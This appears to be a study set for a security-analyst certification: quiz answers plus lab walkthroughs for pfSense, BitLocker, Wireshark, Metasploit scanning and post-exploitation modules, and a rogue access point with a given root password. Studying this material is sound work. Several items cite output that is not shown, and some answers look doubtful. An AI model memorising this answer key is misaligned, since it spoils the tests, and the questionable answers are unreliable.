DoS Attack: Secure remote administration and connectivity testing. Perform extensive input validation. Configure the firewall to deny ICMP traffic. Stop data processed by the attacker from being executed.
Directory Traversal: Update web servers with security patches on a regular basis. Limit access to the secure areas of the website.

Which of the following is beta testing also known as?

User acceptance testing

How is probability determined using quantitative analysis?

Using the ARO calculation

Which of the following can be run as traditional software on a virtual machine?

VFA

You have just run the nmap command shown below. Which vulnerabilities were found on the target firewall?

VPN

Which vulnerability life cycle step is BEST described as the phase in which a security analyst determines whether all the previous phases are effectively employed?

Verification

While looking at user logs you notice a user has been accessing items they should not have rights to. After speaking to the user, you believe your system may have experienced an attack. Which type of attack has the system MOST likely experienced?

Vertical privilege escalation

The following command and output were performed against a new web server prior to deploying it to production. Which type of security process identifies security weaknesses in an organization's infrastructure that might result in the output below?

Vulnerability assessment

Which method involves considering all of an incident's details and taking action to keep the incident from happening again?

Vulnerability mitigation

During which phase of the Kill Chain framework is malware code encapsulated into commonly used file formats, such as PDF files, image files, or Word documents?

Weaponization

What information is included in the service portion of a due diligence assessment? (Select two.)

What level of system access does the vendor require? Does the vendor provide reliable and timely product support?

You are monitoring your network's traffic, looking for signs of strange activity. After looking at the logs, you see that there was a recent spike in database read volume. Could this be a problem and why?

Yes. A spike in database read volume can show that a hacker has downloaded a great deal of information from the database.

You are looking through your network usage logs and notice logins from a variety of geographic locations that are far from where your employees usually log in. Could this be a problem and why?

Yes. Logins from strange geographical locations can show that a hacker is trying to gain access from a remote location.

You are testing a new application using a combination of known and unknown testing. How would you BEST describe this approach?

You are engaging in partially known testing.

How can the Wireshark tool help you with digital forensics?

You can use it to analyze packets to search for evidence.

Your network has been subject to a variety of network attacks and you are currently monitoring the user logs for suspicious activity, yet further attacks are still occurring. Which additional step could you take to increase network security?

You could regularly scan your system for vulnerabilities.

You are the security analyst for your organization. During a vulnerability analysis, you have discovered what looks to be malware, but it does not match any signatures or identifiable patterns. Which of the following BEST describes the threat you have discovered?

Zero-day

As you perform an audit of your company's DNS servers, you notice from an external third-party DNS source that the following information is visible. You know the servers listed are internal only and should not be visible in a domain query. What is it called when internal DNS server information is available outside of a company's network?

Zone transfer

A password spraying attack is MOST like which of the following attack types?

a brute force attack

Which set of tools is often used to intercept the four-way handshake?

aircrack-ng

Which technology causes a transistor in the chip to blow if the chip's firmware is altered?

eFuse

Which Windows command line tool can be used to show and modify a file's permissions?

icacls

A(n) ______ threat comes from a disgruntled employee or contractor.

internal

Which of the following is a valuable resource for security analysts to find out what the newly discovered Trojan and malware risks are?

it-isac.org

You are the security analyst for a small corporate network. You are concerned that several employees may still be using the unsecured FTP protocol against company policy. You have been capturing data for a while using Wireshark and are now examining the filtered FTP results. You see that several employees are still using FTP. Which user account used the password of lsie*$11?

jsmith

When scanning a Linux machine for running applications, you see the following output. Which kill signal should you use to clean up the offending process?

kill -9

A Windows machine in your office has been sending and receiving more traffic than usual, and a user is complaining that it has a slow connection. Your manager would like statistics on all protocol traffic to and from that machine over Ethernet. The netstat command can do that, but you need to know the switch that will give an output similar to what is shown below. Which command and options should you use?

netstat -e -s

Which command was invoked to start PID 3825 in the output below in conjunction with the ps aux command?

python

A(n) ______ assessment measures valuation and intangibles.

qualitative

A(n) ______ assessment measures the direct value of tangible assets.

quantitative

There is strong evidence that a machine is compromised on your company network, but you have not determined which computer. You are going to try to pinpoint the host by scanning for any network devices that are in promiscuous mode. Which of the following Nmap scripts would you use?

sniffer-detect

Which command is used to allow a string to be copied in the code, but can be exploited to carry out overflow attacks?

strcpy

You have been tasked with securing a Linux box that the development team needs occasional FTP access to. The developers should start the vsftpd daemon as needed and then stop it when finished with their task. To help prevent the vsftpd service from running unintentionally, you run the following command and receive the output listed. What command should you run to prevent the service from starting when the Linux machine boots?

systemctl disable vsftpd

What is the name for a mock attack exercise that simulates an actual network attack?

tabletop

You are reviewing packets captured by a co-worker. The traffic is from a Linux server that hosts private customer data, and your job is to analyze the content for potential security risks. The .pcap file appears to be a bit small for what you wanted. (It contains traffic to and from the target system during a given time period.) Some of that traffic is shown below. You suspect that only SSH traffic is represented in this capture, which was done with tcpdump. What command do you think your co-worker used to capture only SSH traffic?

tcpdump port 22

As a security consultant, you have been tasked with checking what company data is currently visible to the public. Using theHarvester tool, you query for information and receive too much information coming from too many sources. The following image represents your query. Which of the commands below limits the number of results to 750 and only queries Google?

theHarvester -d rmksupplies.com -l 750 -b google

As part of setting up a Windows machine to send log events to a remote host, you have executed the winrm qc command and answered the questions as shown below. Which command would you run on the collector host from an elevated Command Prompt?

wecutil qc

A member of which team is often used to oversee a tabletop exercise?

white

Which EAP protocol provides authentication using a protected access credential?

EAP-FAST

You are the security analyst for a small corporate network. Your manager has received several concerning emails. He has asked you to view his email and determine whether these messages are hazardous or safe. In this lab, your task is to: Read each email and determine whether the email is legitimate. Delete any emails that are attempts at social engineering. Keep all emails that are safe.

Emails to delete:
Microsoft Windows Update Center - New Service Pack
Jim Haws - Re: Lunch Today?
Executive Recruiting - Executive Jobs
Riverdale Estates HOA - Payment Pending
Grandma White - FW: FW: FW: Virus Attack Warning
Daisy Knudsen - Web Site Update
Rachelle Hancock - Wow!!
Grandma White - Free Airline Tickets

A hacker wants to leverage social media to glean information coming from a certain location. Which tool is BEST suited for the job?

Echosec

Compliments, misinformation, feigning ignorance, and being a good listener are tactics of which social engineering technique?

Elicitation

What is the primary purpose of eradication?

Eliminate all traces of an incident while carefully preserving evidence that may be used in a criminal investigation.

Which of the following is an advantage of setting up a federation?

Employees have easier onboarding.

You have been hired by an organization that has been victimized by session hijacking. What is one of the most important steps you as a security analyst can take to prevent further session hijacking attacks?

Encrypt network traffic.

Which of the following is an example of IAM?

Entering a PIN

What is the philosophy behind DevSecOps?

Everyone on the development team should be responsible for security.

Which Wi-Fi attack uses a rogue access point configured with the same SSID as the organization's SSID?

Evil twin

What information will be returned from the following google search?

Excel documents with the word "password" in the title, but not from .gov and .gov.uk websites.

Which items are included in an acceptable use policy? (Select two.)

Expectations for user privacy when using company resources
How information and network resources should be used

Which of the following validation types requires an extensive verification process and shows a padlock, business name, and country code?

Extended

Which processor chip can be configured by the end user to perform the tasks he or she needs it to?

FPGA

Which of the following firewall identification methods uses a TCP packet with a TTL value set to expire one hop past the firewall?

Firewalking

A security analyst is testing to find SQL injection vulnerabilities. She uses automation of a large volume of random data inserted into the web application's input fields in order to check the output. Which type of testing was done?

Fuzz testing

Which of the following is a popular honeypot that can be used to create thousands of other honeypots?

Honeyd

Which of the following is a device used by the blue team to lure an unsuspecting attacker to aimlessly explore?

Honeypot

Which of the following should be designed to look and function like a real resource in order to attract attackers?

Honeypot

What is the name of a computer on which a hypervisor runs to provide one or more virtual machines?

Host

A single end user at your company is complaining of login failures to an internal-only website that is used daily by many employees. When you access the machine to visit the remote site, you see that the URL for the requested website is changed to an IP address that appears to be in Cambodia and is 57.72.80.14. What would be the simplest type of DNS attack that the user could be experiencing in this scenario?

Host file manipulation

What do partial, risk-informed, repeatable, and adaptive achievements indicate?

How core functions align with an organization's risk management procedures

Each user on a network must have a unique digital identity. Which of the following is this known as?

Identity and access management (IAM)

One common setting on electronic tablets is a feature that erases all data if the password or passcode is entered incorrectly too many times. This can be a very good thing for corporate devices or devices that contain company data. What is a logical reason that this setting could be a bad idea in certain situations?

If a user doesn't know about the policy, is inattentive, or a child gets the device and enters the passcode incorrectly, important data could be lost.

Which of the following is true regarding containerization?

If an attacker gains access to the operating system, they will have access to all containers.

What should you do with email from unknown or unverified user accounts?

Ignore the email.

Downtime, penalties, and damage to assets are incident consequences with which type of impact?

Immediate impact

Your company has had a problem with users getting hacked even though you have established strong password policies. What is the next logical step to increase your company's security?

Implement two or more methods of authentication.

Which of the following BEST describes system logs?

Indicate logins with escalated privileges.

Hackers use social networking, dumpster diving, social engineering, and web surfing during which portion of their reconnaissance?

Information gathering techniques

What is a likely motivation for DoS and DDoS attacks?

Injury of the target's reputation

Which of the following is a good way to prevent privilege escalation attacks?

Limit privileges.

Which of the following honeypot interaction levels simulates a real OS, its applications, and its services?

Medium

Which of the following Windows permissions apply to local files and directories?

NTFS

Including a legitimate-looking embedded link to a malicious site in an email purporting to be from a legitimate source is which of the following types of cyberattack?

Phishing

You are tasked with changing the certificate authority to require that all requests be placed in the pending state until processed by an administrator. You have started certsrv (the certificate authority console) and are looking at the certificate authority's properties. Which tab would you select to change the way certificate requests are handled?

Policy Module

During which phase of the incident response life cycle do you hold meetings to discuss lessons learned from the incident and the response?

Post-incident activities

Which phase includes taking the recommendations that can be put into action through security implementations, policies, and procedures?

Post-incident feedback

Which of the following BEST describes the process of verifying that a device meets the minimum health requirements?

Posture assessment

The annual loss expectancy (ALE) calculation provides an organization's stakeholders with what information?

Potential financial loss of an event based on how often a threat could occur.

During which phase of the incident response life cycle do you reinforce your systems, policies, and procedures to ensure that your resources are well secured?

Preparation

Which of the following actions can help safeguard against data loss?

Routinely review access controls to ensure only needed access is given to each employee.

Which of the following needs to be configured so a firewall knows which traffic to allow or block?

Rules

Which of the following is true about rule-writing?

Rules could be as simple as looking for unsuccessful logins or could include more complex behavioral patterns.

A retail company is getting complaints from customers about how long product pages are taking to load, which is causing a decline in sales. Which of the following actions should you take first to discover the source of the problem?

Run a network bandwidth test on the company's network to determine if there are any anomalies.

Drag the vulnerability to the appropriate mitigation technique.

Unused User Accounts and Services: Run all processes using the least privileged account. Use secure web permissions and access control mechanisms.
File and Directory Management: Disable the directory listing option and remove the ability to load non-web files from a URL.
Website Changes: Use scripts and systems to compare file hash values with the master value to detect possible changes.
HTTP Response Splitting Attacks: Remove user input fields when possible.

Tom, a security analyst, is notified by Karen, an employee, that her work iPad has some setting changes and a new app that she didn't download. What is the first step Tom should take?

Run an antivirus software scan on Karen's device and scan the entire network.

Which of the following allows users to sign into a single trusted account, such as Google or Facebook?

SSO

Which of the following is a fixed-sized bit array that has random data added to each plaintext hash?

Salted hashes

A coworker has run Scout Suite against your Microsoft Azure environment. What were they looking for?

Scout Suite is used to show potential security risks on cloud deployments.

Which of the following BEST describes how using scripts is different from running regular code?

Scripts are usually interpreted instead of compiled.

Which of the following is an open-source intrusion detection system that provides search and analysis tools to help index collected data?

Security Onion

Which of the following is a best practice for implementing security patches?

Security patches should be tested and implemented in a sandbox before being applied to all active systems.

A person in a dark grey hoodie has jumped the fence at your research center. A security guard has detained this person, denying them physical access. Which of the following areas of physical security is the security guard currently in?

Security sequence

Which security function identifies and evaluates threats in hopes of reducing their impact?

Risk management

Brandon is helping Fred with his computer. He needs Fred to enter his username and password into the system. Fred enters the username and password while Brandon is watching him. Brandon explains to Fred that it is not a good idea to allow anyone to watch you type in usernames or passwords. Which type of social engineering attack is Fred referring to?

Shoulder surfing

During a tabletop exercise, someone from the red team has a question about a procedure's validity and whether or not it would violate the terms of engagement. How should this be determined?

The white team must answer the question before moving forward.

An organization's cybersecurity staff needs to be competent at their jobs or serious consequences can occur. Which of the following is an important component to staying up to date and honing a team's cybersecurity skills?

Training

A resentful employee hacks into a company's website and replaces all the text and images with obscene material. They also replace all links with malicious ones. This is an example of which of the following?

Vandalism

Kjell is a security analyst and needs to see if any sensitive information is available through old website snapshots. Which tool is BEST suited for this purpose?

Wayback Machine

During which phase of the Kill Chain framework does an intruder extract or destroy data?

Action on Objectives

A security analyst and their team go through the entire list of assets in the company and assign each item a level of priority. Then they group the assets in the same levels together so they can create defense strategies for each group. What is this process called?

Bundling critical assets

Which type of testing is typically done by an internal tester who has full knowledge of the network, computer system, and infrastructure?

Known

When performing an authorized security audit of a website, you are given only the website address and asked to find other hosts on that network that might be vulnerable to attack. Which of the following tools might be used to lead you to the following Nmap output? (Select two.)

whois.org nslookup

An organization's user data server is backed up daily. Referencing the CIA triad, this is an example of which of the following?

Availability

Which team is responsible for defending the network against attacks in a risk training scenario?

Blue

Robyn, a new employee, needs to choose a password to log into the system. She doesn't want to forget it, but she needs to meet certain criteria required by security. What should she do?

Choose a password that's easy to remember but doesn't include any personal information.

Restoring data from backup is an example of which type of security control?

Compensating

A speaker was invited to a company-wide training meeting. When he arrived, he identified himself at the front desk, and the receptionist gave him directions on how to find the conference room. What important step did the receptionist miss?

Escorting him to the conference room

A tabletop exercise is a theoretical exercise where each team is given a set of criteria and then left to evaluate and strategize. They evaluate the what, when, where, why, and how. What is the purpose of this exercise?

It gives each team the opportunity to hone their skills and evaluate different techniques for attack and defense.

What seven-phase framework did Lockheed Martin develop to identify an attacker's step-by-step attack process?

Kill Chain

Which framework includes the Reconnaissance, Weaponization, Delivery, Exploitation, Installation, Command and Control, and Actions on Objectives phases?

Kill Chain

Which of the following BEST describes a physical barrier used to deter an aggressive intruder?

Large flowerpots

While reviewing video files from your organization's security cameras, you notice a suspicious person using piggybacking to gain access to your building. The individual in question did not have a security badge. Which of the following would you most likely implement to keep this from happening in the future?

Mantraps

Which of the following are tactics social engineers might use?

Moral obligation, ignorance, and threatening

Which type of framework is fairly rigid and requires that specific controls be implemented?

Prescriptive

Natural disasters can happen at any time and have unknown or incalculable effects. Based on information from subject matter experts, the probability of a natural disaster is once every 75 years. Using this information, what is the annualized rate of occurrence (ARO) for a natural disaster affecting an organization?

0.013

Which of the following are true about threats and vulnerabilities? (Select two.)

A threat is a potential source of harm. A vulnerability is an opening for an attacker to exploit.

Sophisticated attacks executed by highly skilled hackers with a specific target or objective in mind are classified as which type of threat?

Advanced persistent threat

Which threat modeling component identifies potential threat sources, what these adversaries can do, and how likely these attacks are?

Adversary capability analysis

Which threat modeling measurement is used to describe how an attack can exploit a vulnerability?

Attack vector

There are five phases in the security intelligence life cycle. During which phase do you gather and process information from your internal sources, such as system and application logs?

Collection

Threats are usually ranked from high to low. A higher number indicates a dangerous threat. A lower number indicates threats that may be annoyances but aren't necessarily malicious in nature. What is this high-to-low scale known as?

Confidence level

Access to a database is protected by multi-factor authentication. In the CIA triad, this is an example of which of the following?

Confidentiality

What do each of the letters represent in the CIA triad? (Select three.)

Confidentiality Integrity Availability

A new piece of equipment is placed into production. It is connected and powered on. Which of the following is the known threat vulnerability introduced in this scenario?

Default credentials

Ron, a hacker, wants to gain access to a prestigious law firm he has been watching for a while. June, an administrative assistant at the law firm, is having lunch at the food court around the corner from her office. Ron notices that June has a picture of a dog on her phone. He casually walks by and starts a conversation about dogs. Which phase of the social engineering process is Ron in?

Development phase

As a security technician who is in charge of physical security for computer and network resources, you are responsible for ensuring a quick recovery should an event occur. A physical storage device controlling data backups has failed, causing corruption for a weekly full backup. It failed on Saturday. On Monday, you noticed the errors and have since run a restore of needed data and a full backup to ensure continuity. The failed device has been replaced. Since each work day creates unique data to be backed up, which type of backup would be the preferred method to make certain each day's data was properly maintained while ensuring efficiency? (The time required for backup is not a primary concern, but the time needed to restore data is, as is backup data storage space.)

Differential backup

You are in the process of implementing policies and procedures that require employee identification. You observe employees holding a secure door for others to pass through. Which of the following training sessions should you implement to help prevent this in the future?

How to prevent piggybacking and tailgating.

Which information type is a hacker working with when they gather geographical information, entry control points, and employee routines?

Physical security

COBIT, ITIL, and ISO are examples of which type of framework?

Prescriptive

Important aspects of physical security include which of the following?

Preventing interruptions of computer services caused by problems such as fire

What are the three factors to keep in mind with physical security?

Prevention, detection, and recovery

Which of the following BEST describes what asset criticality does?

Prioritizes systems for scanning and remediation

When determining a risk's severity, which of the following are best to consider? (Select two.)

Probability
Magnitude

Which team is responsible for trying to infiltrate and attack a network?

Red

Attackers often target data and intangible assets. Identify what hackers may do with the information they collect. (Select two.)

Sell the data to the competition
Harm a company's reputation

Miguel has been practicing his hacking skills. He has discovered a vulnerability on a system that he did not have permission to attack. Once Miguel discovered the vulnerability, he anonymously alerted the owner and instructed them on how to secure the system. Which type of hacker is Miguel in this scenario?

Semi-authorized

Which BEST defines the term base in CVSS?

A vulnerability's unique characteristics

When a host initiates a connection to a server via the TCP Protocol, a three-way handshake is used. What is the host's final reply?

ACK

Who maintains the Android source code?

AOSP

Which of the following BEST describes workflow orchestration?

A collection of tasks that are performed in a logical sequence as efficiently as possible.

Which frequency does ZigBee operate at?

2.4 GHz

You are the security analyst for a small corporate network. You are currently using pfSense as your security appliance. In this lab, your task is to:
Change the password for the default pfSense account from pfsense to Donttre@donme.
Create a new administrative user with the following parameters: Username: lyoung; Password: C@nyouGuess!t; Full Name: Liam Young; Group Membership: admins.
Set a session timeout of 20 minutes for pfSense.
Disable the webConfigurator anti-lockout rule for HTTP.

1. Access the pfSense management console.
a. From the taskbar, select Google Chrome.
b. Maximize the window for better viewing.
c. In the Google Chrome address bar, enter 198.28.56.22 and then press Enter.
d. Enter the pfSense sign-in information as follows:
§ Username: admin
§ Password: pfsense
e. Select SIGN IN.
2. Change the password for the default (admin) account.
a. From the pfSense menu bar, select System > User Manager.
b. For the admin account, under Actions, select the Edit user icon (pencil).
c. For the Password field, change to Donttre@donme.
d. For the Confirm Password field, enter Donttre@donme.
e. Scroll to the bottom and select Save.
3. Create and configure a new pfSense user.
a. Select Add.
b. For Username, enter lyoung.
c. For the Password field, enter C@nyouGuess!t.
d. For the Confirm Password field, enter C@nyouGuess!t.
e. For Full Name, enter Liam Young.
f. For Group Membership, select admins and then select Move to Member of list.
g. Scroll to the bottom and select Save.
4. Set a session timeout for pfSense.
a. Under the System breadcrumb, select Settings.
b. For Session timeout, enter 20.
c. Select Save.
5. Disable the webConfigurator anti-lockout rule for HTTP.
a. From the pfSense menu bar, select System > Advanced.
b. Under webConfigurator, for Protocol, select HTTP.
c. Select Anti-lockout to disable the webConfigurator anti-lockout rule.
d. Scroll to the bottom and select Save.

You are the security analyst for a small corporate network. To increase security for the corporate network, you have installed the pfSense network security appliance on your network. Using pfSense, you now need to configure DNS and a default gateway. In this lab, your task is to:
Sign in to pfSense using the following case-sensitive information: URL: 198.28.56.22; Username: admin; Password: pfsense.
Configure the DNS servers as follows:
Primary DNS server: 163.128.78.93 - Hostname: DNS1
Secondary DNS server: 163.128.80.93 - Hostname: DNS2
Configure the WAN IPv4 information as follows:
Enable the interface.
Use a static IPv4 address of 65.86.24.136/8.
Add a new gateway using the following information: Type: Default gateway; Name: WANGateway; IP address: 65.86.1.1.

1. Access the pfSense management console.
a. From the taskbar, select Google Chrome.
b. Maximize the window for better viewing.
c. In the address bar, type 198.28.56.22 and then press Enter.
d. Sign in using the following case-sensitive information:
§ Username: admin
§ Password: pfsense
e. Select SIGN IN or press Enter.
2. Configure the DNS servers.
a. From the pfSense menu bar, select System > General Setup.
b. Under DNS Server Settings, configure the primary DNS server as follows:
§ Address: 163.128.78.93
§ Hostname: DNS1
§ Gateway: None
c. Select Add DNS Server to add a secondary DNS server and then configure it as follows:
§ Address: 163.128.80.93
§ Hostname: DNS2
§ Gateway: None
d. Scroll to the bottom and select Save.
3. Configure the WAN settings.
a. From the pfSense menu bar, select Interfaces > WAN.
b. Under General Configuration, select Enable interface.
c. Use the IPv4 Configuration Type drop-down to select Static IPv4.
d. Under Static IPv4 Configuration, in the IPv4 Address field, enter 65.86.24.136.
e. Use the IPv4 Address subnet drop-down to select 8.
f. Under Static IPv4 Configuration, select Add a new gateway.
g. Configure the gateway settings as follows:
§ Default: Select Default gateway
§ Gateway name: Enter WANGateway
§ Gateway IPv4: 65.86.1.1
h. Select Add.
i. Scroll to the bottom and select Save.
j. Select Apply Changes.

You are the security analyst for a small corporate network. You recognize that the threat of malware is increasing, and you have implemented Windows Security on the office computers. In this lab, your task is to configure Windows Security as follows:
Add a file exclusion for D:\Graphics\book.jpg.
Add a process exclusion for files associated with your corporate software (corp_process.exe).
Check for virus and threat updates.
Perform a quick scan.

1. Add a file exclusion.
a. In the search field on the taskbar, type Windows Security.
b. Under Best match, select Windows Security.
c. Maximize the window for better viewing.
d. Select Virus & threat protection.
e. Under Virus & threat protection settings, select Manage settings.
f. Under Exclusions, select Add or remove exclusions.
g. Select + Add an exclusion.
h. From the drop-down list, select File.
i. Under This PC, select Data (D:).
j. Double-click Graphics.
k. Select book.jpg.
l. Select Open.
2. Add a process exclusion.
a. Select + Add an exclusion.
b. From the drop-down list, select Process.
c. In the Enter process name field, enter corp_process.exe for the process name.
d. Select Add.
3. Update protection definitions.
a. In the left menu, select the shield (Virus & threat protection) icon.
b. Under Virus & threat protection updates, select Check for updates.
c. Under Security Intelligence updates, select Check for updates.
4. Perform a quick scan.
a. In the left menu, select the shield icon.
b. Under Current threats, select Quick scan to run a quick scan now.

You are the security analyst for a small corporate network. Your boss is concerned that her computer (Exec) contains sensitive company information. To prevent this information from being stolen, you have decided to encrypt the drive using BitLocker. The Exec computer has a built-in TPM on the motherboard. In this lab, your task is to configure BitLocker drive encryption as follows:
- Try to turn on BitLocker for the System (C:) drive. Answer the question.
- From the BIOS settings, turn on and activate TPM.
- Turn on BitLocker for the System (C:) drive.
- Save the recovery key to \\CorpServer\BU-Exec.
- Encrypt the entire System (C:) drive.
- Run the BitLocker system check.

1. Attempt to enable BitLocker.
   a. In the search field on the taskbar, enter Bitlock.
   b. Under Best match, select Manage BitLocker.
   c. Under Operating system drive, select Turn on BitLocker.
   d. In the top right, select Answer Questions.
   e. Answer Question 1 and then minimize the question dialog.
   f. Select Cancel.
2. Access Exec's BIOS settings.
   a. From the taskbar, right-click Start and then select Shut down or sign out > Restart.
   b. When the TestOut logo appears, press Delete to enter the BIOS.
3. Turn on and activate TPM.
   a. From the left pane, expand Security.
   b. Select TPM Security.
   c. From the right pane, select TPM Security to turn TPM security on.
   d. Select Apply.
   e. Select Activate.
   f. Select Apply.
   g. Select Exit. Windows is restarted and you are signed in.
4. Turn on BitLocker.
   a. After Exec finishes rebooting, in the search field on the taskbar, enter Bitlock.
   b. Under Best match, select Manage BitLocker.
   c. Under Operating system drive, select Turn on BitLocker. Windows is now able to begin the Drive Encryption setup.
5. Save the recovery key to \\CorpServer\BU-Exec.
   a. Select Save to a file to back up your recovery key to a file.
   b. Browse the network to \\CorpServer\BU-Exec.
   c. Select Save.
   d. After your recovery key is saved, select Next.
6. Choose how much of your drive to encrypt and verify that the drive is encrypted.
   a. Select Encrypt entire drive and then click Next.
   b. Leave the default setting selected when choosing the encryption mode and click Next.
   c. Select Run BitLocker system check and then click Continue.
   d. Select Restart now.
   e. When the encryption process is complete, select Close.
7. Verify that System (C:) is being encrypted.
   a. From the taskbar, open File Explorer.
   b. From the left pane, select This PC.
   c. From the right pane, verify that the System (C:) drive shows the lock icon.
   d. In the top right, select Answer Questions.
   e. Select Score Lab.
   f. Windows indicates that a TPM was not found.

You are the security analyst for your company. Your friend at a partner company asked you to scan his company's public-facing servers to see if they have any obvious vulnerabilities. The PartnerCorp servers are on the 73.44.216.0 network. In this lab, your task is to:
- Perform a scan using the following information:
  - Network address: 73.44.216.0
  - Subnet mask: Class C
- Answer the questions.

1. Scan the PartnerCorp servers for vulnerabilities.
   a. From the Favorites bar, select Zenmap.
   b. At the prompt, type nmap 73.44.216.0/24.
   c. Select Scan.
2. Find the network vulnerabilities in the output and then answer the questions.
   a. In the top right, select Answer Questions.
   b. Answer the questions.
   c. Select Score Lab.
1- Yes 2- telnet

You are the security analyst for a small corporate network. You want to find specific information about the packets being exchanged on your network using Wireshark. In this lab, your task is to:
- Use Wireshark to capture packets from the enp2s0 interface.
- Use a Wireshark filter to isolate and examine packets for:
  - All network traffic for 192.168.0.0
  - All traffic for the 192.168.0.45 host
  - All IP traffic with a source address of 192.168.0.45
  - All IP traffic with a destination address of 192.168.0.45
  - All HTTP traffic on port 80
  - All packets with an Ethernet MAC address containing 11:12:13
  - All TCP packets that contain the word "password"
- Answer the questions.

1. Begin a Wireshark capture.
   a. From the Favorites bar, select Wireshark.
   b. Maximize the window for easier viewing.
   c. Under Capture, select enp2s0.
   d. Select the blue fin to begin a Wireshark capture.
2. Apply the net 192.168.0.0 filter.
   a. In the Apply a display filter field, type net 192.168.0.0 and press Enter. Look at the source and destination addresses of the filtered packets.
   b. Select the red square to stop the Wireshark capture.
   c. In the top right, select Answer Questions.
   d. Answer Question 1.
3. Apply the host 192.168.0.45 filter.
   a. Select the blue fin to begin a Wireshark capture.
   b. In the Apply a display filter field, type host 192.168.0.45 and press Enter. Look at the source and destination addresses of the filtered packets.
   c. Answer Question 2.
4. Apply the ip.src==192.168.0.45 filter.
   a. In the Apply a display filter field, type ip.src==192.168.0.45 and press Enter. Look at the source and destination addresses of the filtered packets.
   b. Answer Question 3.
5. Apply the ip.dst==192.168.0.45 filter.
   a. In the Apply a display filter field, type ip.dst==192.168.0.45 and press Enter. Look at the source and destination addresses of the filtered packets.
   b. Answer Question 4.
6. Apply the tcp.port==80 filter.
   a. In the Apply a display filter field, type tcp.port==80 and press Enter. Look at the source and destination addresses of the filtered packets.
   b. Answer Question 5.
7. Apply the eth contains 11:12:13 filter.
   a. In the Apply a display filter field, type eth contains 11:12:13 and press Enter. Look at the source and destination addresses of the filtered packets.
   b. Answer Question 6.
8. Apply the tcp contains password filter.
   a. In the Apply a display filter field, type tcp contains password and press Enter.
   b. Select the red box to stop the Wireshark capture.
   c. Locate the password.
   d. Answer Question 7.
   e. Select Score Lab.
1- Only packets with either a source or destination address on the 192.168.0.x network are displayed.
2- Only packets with 192.168.0.45 in either the source or destination address are displayed.
3- Only packets with 192.168.0.45 in the source address are displayed.
4- Only packets with 192.168.0.45 in the destination address are displayed.
5- Only packets with port 80 in either the source or destination port are displayed.
6- Only packets with 11:12:13 in either the source or destination MAC address are displayed.
7- hippophobia

You are the security analyst working for CorpNet. PartnerCorp wants to protect against any potential weakness in their public-facing servers. While doing some testing, you have discovered one of their Windows servers named partnercorp_www3.partnercorp.xyz with an IP address of 73.44.215.3. You believe a Microsoft SQL server is installed on this server, but it doesn't respond to the default TCP port of 1433. In this lab, your task is to: Use the auxiliary/scanner/mssql/mssql_ping exploit in Metasploit to determine which TCP port Microsoft SQL is using. Answer the question.

1. Configure Metasploit framework to use the MSSQL Ping Utility exploit.
   a. From the Favorites bar, select metasploit framework.
   b. At the prompt, type use auxiliary/scanner/mssql/mssql_ping and press Enter to use the MSSQL Ping Utility exploit.
   c. Type show options and press Enter to show the exploit options. Notice that the RHOSTS setting is absent.
2. Configure RHOSTS to the correct IP address.
   a. Type set RHOSTS 73.44.215.3 and press Enter to specify the remote host.
   b. Type show options and press Enter to show the exploit options. Notice that RHOSTS has been configured.
3. Execute the exploit and answer the question.
   a. Type exploit and press Enter to begin the exploit.
   b. In the top right, select Answer Questions.
   c. Answer the question.
   d. Select Score Lab.
1- 1533

You are the security analyst working for CorpNet. You are assisting PartnerCorp to defend against weaknesses in their public-facing servers. While doing some testing, you discover that from outside of the PartnerCorp network, you are able to deploy a Metasploit payload to one of their Windows servers named partnercorp_www3.partnercorp.xyz. You are determining whether the Windows patches are up to date or if there is an unpatched vulnerability that could be exploited. In this lab, your task is to: Use the post/windows/gather/enum_patches exploit in Metasploit to enumerate the Windows patches that are missing or vulnerable. Answer the question.

1. Configure Metasploit framework to use the enum_patches exploit.
   a. From the Favorites bar, select metasploit framework.
   b. At the prompt, type use post/windows/gather/enum_patches and then press Enter to use the enumerate patches exploit.
   c. Type show options and press Enter to show the exploit options. (Notice that the session option is absent.)
2. Set the session option.
   a. Type set session 1 and press Enter.
   b. Type show options and press Enter. (Notice that the session option has been set.)
3. Run the exploit and answer the question.
   a. Type run and press Enter to begin the exploit.
   b. In the top right, select Answer Questions.
   c. Answer the question.
   d. Select Score Lab.
1- KB2871997, KB2928120

You are the security analyst for a small corporate network. You have decided to test how secure the company's network would be if a rogue wireless access point was introduced. To do this, you have connected a small computer to the switch in the Networking Closet. This computer also functions as a rogue wireless access point. You are now sitting in your van in the parking lot of your company, where you are connected to the internal network through the rogue wireless access point. Using the small computer you left behind, you want to test running remote exploits against the company. In this lab, your task is to: Use ssh -X to connect to your rogue computer (192.168.0.251). Use 1worm4b8 as the root password. Use Zenmap on the remote computer to scan all the ports on the internal network and look for computers vulnerable to attack. Answer the questions.

1. Connect to the network using the rogue system.
   a. From the Favorites bar, select Terminal.
   b. At the prompt, type ssh -X 192.168.0.251 and press Enter.
   c. For the root password, type 1worm4b8 and press Enter. You are now connected to Rogue1.
2. Scan the network using Zenmap.
   a. Type zenmap and press Enter to launch Zenmap remotely. Zenmap is running on the remote computer, but you see the screen locally.
   b. In the Command field, type nmap -p- 192.168.0.0/24.
   c. Select Scan.
1- 192.168.0.15, 192.168.0.22 2- 192.168.0.10

You are the security analyst for a small corporate network. You previously configured the BranchVPN1 server as a remote access server to allow VPN connections. Members of the sales department connect to the server to upload their sales reports as they work from home or on the road. In this lab, your task is to create and configure a network policy to allow members of the sales department to remotely connect using the following parameters: Name the policy Sales. Use a remote access server. Connecting users/computers must belong to the Sales group. Deny access to any account that is not configured in Active Directory. Configure permissions to use settings in the Active Directory user accounts (User Dial-in properties). User account settings are configured by an Active Directory user account administrator. Use the secured password (EAP-MSCHAP v2). Configure a session timeout of 30 minutes. As a constraint, allow access only from 6:00 a.m. to 9:00 p.m., Monday-Friday. Make the policy first in the list of policies.

1. Create a remote access network policy named Sales.
   a. From Server Manager, select Tools > Network Policy Server.
   b. Maximize the window for better viewing.
   c. Expand Policies.
   d. Right-click Network Policies and then select New.
   e. In the Policy name field, enter Sales.
   f. From the Type of network access server drop-down list, select Remote Access Server (VPN-Dial up).
   g. Select Next.
2. Add a condition to the network policy.
   a. Select Add to add group membership as a condition.
   b. Select Windows Groups.
   c. Select Add.
   d. Select Add Groups.
   e. Under Enter the object names to select, enter Sales.
   f. Select OK.
   g. Select OK to close the Windows Groups dialog.
   h. Select Next.
3. Specify the access permissions.
   a. Select Access denied.
   b. Select Access is determined by User Dial-in properties.
   c. Select Next.
4. Configure the authentication methods.
   a. Under EAP Types, select Add.
   b. Select Microsoft: Secured password (EAP-MSCHAP v2) and then select OK.
   c. Under Less secure authentication methods, unmark all options.
